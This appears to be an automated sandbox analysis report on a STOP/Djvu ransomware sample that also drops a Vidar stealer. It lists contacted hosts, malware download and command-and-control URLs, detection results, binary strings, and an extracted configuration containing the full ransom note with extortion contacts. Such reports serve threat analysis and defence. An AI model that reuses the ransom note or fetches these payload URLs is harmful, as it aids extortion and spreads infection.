Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
95.217.9.149	unknown	Germany	24940	HETZNER-ASDE	false
186.13.17.220	sdfjhuz.com	Argentina	11664	TechtelLMDSComunicacionesInteractivasSAAR	true
189.245.19.217	cajgtus.com	Mexico	8151	UninetSAdeCVMX	true
104.21.65.24	api.2ip.ua	United States	13335	CLOUDFLARENETUS	false
23.59.200.146	steamcommunity.com	United States	16625	AKAMAI-ASUS	false

Contacted Domains

Name	IP	Active
sdfjhuz.com	186.13.17.220	true
cajgtus.com	189.245.19.217	true
steamcommunity.com	23.59.200.146	true
api.2ip.ua	104.21.65.24	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://cajgtus.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true	true	Avira URL Cloud: safe	unknown
https://95.217.9.149/	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://cajgtus.com/test2/get.php	true	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://cajgtus.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637	true	Avira URL Cloud: safe	unknown
http://sdfjhuz.com/dl/build2.exe	true	26%, Virustotal, Browse Avira URL Cloud: malware	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: UXNob1Dp32.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://cajgtus.com/files/1/build3.exe?	Avira URL Cloud: Label: malware
Source: http://sdfjhuz.com/dl/build2.exe/	Avira URL Cloud: Label: malware
Source: http://sdfjhuz.com/dl/build2.exe$run	Avira URL Cloud: Label: malware
Source: http://sdfjhuz.com/dl/build2.exerun35g	Avira URL Cloud: Label: malware
Source: http://sdfjhuz.com/dl/build2.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe

Avira: detection malicious, Label: TR/AD.MalwareCrypter.llbpm

Found malware configuration

Source: 00000017.00000002.2065451364.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Djvu {"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test2/get.php", "Ransom note file": "_README.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0864PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E
Source: 00000008.00000002.1752904498.00000000035A0000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}

Multi AV Scanner detection for domain / URL

Source: sdfjhuz.com	Virustotal: Detection: 23%	Perma Link
Source: http://sdfjhuz.com/dl/build2.exe/	Virustotal: Detection: 18%	Perma Link
Source: http://cajgtus.com/test2/get.php	Virustotal: Detection: 11%	Perma Link
Source: http://sdfjhuz.com/dl/build2.exe	Virustotal: Detection: 26%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe	Virustotal: Detection: 87%	Perma Link
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Virustotal: Detection: 46%	Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Virustotal: Detection: 87%	Perma Link

Multi AV Scanner detection for submitted file

Source: UXNob1Dp32.exe

Virustotal: Detection: 42%

Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: UXNob1Dp32.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00411178 CryptDestroyHash,CryptReleaseContext,	1_2_00411178
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	1_2_0040E870
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040EA51 CryptDestroyHash,CryptReleaseContext,	1_2_0040EA51
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	1_2_0040EAA0
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040EC68 CryptDestroyHash,CryptReleaseContext,	1_2_0040EC68
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	1_2_00410FC0

Source: UXNob1Dp32.exe, 00000006.00000002.4081262958.0000000000798000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_d21dbb34-7

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Unpacked PE file: 1.2.UXNob1Dp32.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Unpacked PE file: 6.2.UXNob1Dp32.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Unpacked PE file: 9.2.build2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Unpacked PE file: 12.2.UXNob1Dp32.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Unpacked PE file: 14.2.build3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 20.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Unpacked PE file: 24.2.UXNob1Dp32.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 27.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 30.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 32.2.mstsca.exe.400000.0.unpack

Uses 32bit PE files

Source: UXNob1Dp32.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\$WinREAgent\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\$WinREAgent\Scratch\_README.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	File created: C:\_README.txt
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	File created: C:\Users\user\_README.txt

Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.59.200.146:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.9.149:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49755 version: TLS 1.2

Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\l* source: UXNob1Dp32.exe, 00000005.00000003.2193278581.0000000003488000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2193874690.0000000003491000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194897418.0000000003498000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2121514211.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119079628.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2141866780.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140711382.00000000034BD000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140465227.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2142950234.00000000034D5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2187900703.000000000387B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2195602941.000000000387B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194961891.000000000387B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ation source: UXNob1Dp32.exe, 00000005.00000002.2203764277.00000000032E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\gefolusopu\refugefifacek-cibecuciru.pdb source: UXNob1Dp32.exe, 00000000.00000002.1626432855.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000000.00000000.1621402719.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000001.00000000.1624079487.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000003.00000002.1650673211.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000003.00000000.1643851973.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000004.00000000.1645744558.0000000000411000.00000002.00000001.01000000.00000007.sdmp, UXNob1Dp32.exe, 00000004.00000002.1656657577.0000000000411000.00000002.00000001.01000000.00000007.sdmp, UXNob1Dp32.exe, 00000005.00000000.1648043653.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000006.00000000.1654206960.0000000000411000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Z source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\W source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2182625216.0000000003795000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2174814325.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2181866623.0000000003745000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183364884.000000000379C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\P source: UXNob1Dp32.exe, 00000005.00000003.2142833395.000000000367B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2143136874.0000000003693000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152891886.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152955677.000000000369B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2192209394.0000000003804000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2192869446.0000000003692000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2193084806.00000000036C3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\ source: UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036A3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152891886.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152955677.000000000369B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170851615.0000000003692000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\U source: UXNob1Dp32.exe, 00000005.00000003.1836470979.000000000318E000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836548366.00000000031A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\baduleropolec\83 roxihapuponab.pdb source: build2.exe, 00000008.00000000.1746999590.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000008.00000002.1751118423.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\cs\ source: UXNob1Dp32.exe, 00000005.00000003.2140465227.0000000003428000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\0 source: UXNob1Dp32.exe, 00000005.00000003.2075994382.000000000313B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\r\\l7+P8 source: UXNob1Dp32.exe, 00000005.00000003.2195346057.0000000003154000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189453431.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2188598539.0000000003151000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194516135.0000000003151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2193640577.000000000338F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error\ source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\we\y) source: UXNob1Dp32.exe, 00000005.00000003.2188967976.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182066894.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189516260.000000000340F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000000B.00000000.1793257120.0000000000401000.00000020.00000001.01000000.00000009.sdmp, mstsca.exe, 00000020.00000000.3617544736.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\App source: UXNob1Dp32.exe, 00000005.00000003.2170203340.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171630947.0000000003166000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\R source: UXNob1Dp32.exe, 00000005.00000003.2182625216.00000000037EC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189117308.00000000037ED000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2188768311.00000000037AC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2187900703.0000000003785000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\[C source: UXNob1Dp32.exe, 00000005.00000003.2176697587.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176771216.00000000036D3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175838580.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.00000000036E5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\p\s\ source: UXNob1Dp32.exe, 00000005.00000003.2183537439.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183899817.00000000036FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182163208.000000000369B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\p source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836470979.000000000318E000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075833483.0000000003198000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836548366.00000000031A3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2176697587.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176771216.00000000036D3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175838580.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.00000000036E5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\@qKDX source: UXNob1Dp32.exe, 00000005.00000003.2187900703.000000000387B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2195602941.000000000387B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194961891.000000000387B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\$FSS source: UXNob1Dp32.exe, 00000005.00000003.2175321525.0000000003765000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2174814325.0000000003745000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171385752.0000000003745000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: UXNob1Dp32.exe, 00000005.00000003.2176068075.0000000003429000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175605480.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\C:\U source: UXNob1Dp32.exe, 00000005.00000003.2170643885.00000000032EC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176027330.000000000331D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171552388.0000000003301000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: UXNob1Dp32.exe, 00000005.00000003.2182544147.000000000344F000.00000004.00000020.00020000.00000000.sdmp
